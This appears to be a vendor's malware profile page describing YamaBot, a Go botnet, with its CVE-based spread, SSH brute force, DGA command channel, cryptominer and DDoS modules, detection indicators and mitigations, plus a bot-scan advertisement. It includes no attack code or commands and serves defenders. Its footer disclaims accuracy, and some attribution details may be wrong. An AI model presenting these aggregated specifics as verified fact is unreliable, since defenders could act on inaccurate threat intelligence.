YamaBot
Malware⚠️ Overview
YamaBot is a Golang-based botnet first identified in February 2022 by Lumen Technologies’ Black Lotus Labs, primarily targeting Linux-based servers and Internet of Things (IoT) devices. It is operated by an uncategorized threat group and falls under the categories of Botnet, Cryptominer, and DDoS malware due to its modular design for resource hijacking and distributed denial-of-service attacks.
🔧 Technical Capabilities
YamaBot propagates by scanning for vulnerable services, notably exploiting CVE-2022-26134 (Atlassian Confluence remote code execution) and CVE-2022-22954 (VMware Workspace ONE Access SSTI), as well as conducting SSH brute-force credential theft. Its command-and-control (C2) infrastructure relies on HTTP/HTTPS communication with a domain generation algorithm (DGA) to evade takedown. The malware achieves persistence via cron jobs and uses a plugin architecture for payloads: a Monero cryptominer (XMRig) and a DDoS module supporting HTTP, TCP, and UDP flood attacks. Evasion techniques include UPX packing, process name spoofing (e.g., mimicking systemd), and anti-debugging checks that terminate under analysis tools like strace or gdb.
📜 History & Notable Incidents
First observed in early 2022, YamaBot’s initial campaigns targeted misconfigured Linux servers and exposed Confluence instances. In mid-2022, Black Lotus Labs reported a surge in infections exploiting the VMware CVE, with thousands of IP addresses observed in the botnet. No high-profile victims or law enforcement actions have been publicly documented to date. The malware has not been associated with ransomware, but its cryptomining activity has caused significant resource drain on compromised cloud hosts.
🔍 Detection Indicators
Network IoCs include User-Agent strings such as “Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36” used in C2 requests, and HTTPS connections to DGA-generated domains ending in .xyz or .top. File-based indicators include the presence of the binary “yamabot” or “systemd-utils” in /tmp or /var/tmp, while persistence artifacts include cron entries downloading payloads from remote URLs. Behavioral signatures include high CPU usage from the XMRig process and outbound connections on ports 14444 (monero mining) and 80/443 (C2).
☠️ Risk & Impact
YamaBot primarily causes financial losses through unauthorized cryptocurrency mining, consuming CPU and electricity on compromised systems. It also poses a risk to network availability via DDoS capabilities, potentially disrupting services for organizations in the cloud hosting and education sectors, which are frequently targeted due to exposed Confluence instances and weak SSH passwords. Data exfiltration is not a core capability, making it a lower-priority threat for sensitive data breaches.
🛡️ Mitigation
Defenders should immediately patch CVE-2022-26134 and CVE-2022-22954, enforce SSH key-based authentication, and disable root login. Network monitoring can detect YamaBot by alerting on DGA domain lookups and unexpected outbound connections to mining pools, using tools such as YARA rules for the Golang binary signatures and blocking known cryptominer domains. Regular system audits for unauthorized cron jobs and unusual processes are also recommended.
Similar Threats
Malware Threat Protection
Is Your Site Protected Against Malware-Driven Bot Traffic?
Malware families like those described above are commonly distributed through automated bot networks that probe web servers for vulnerabilities. Boteraser helps you monitor and block suspicious bot traffic before it can cause damage.
Run Free Bot Scan →No credit card required · Results in minutes
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.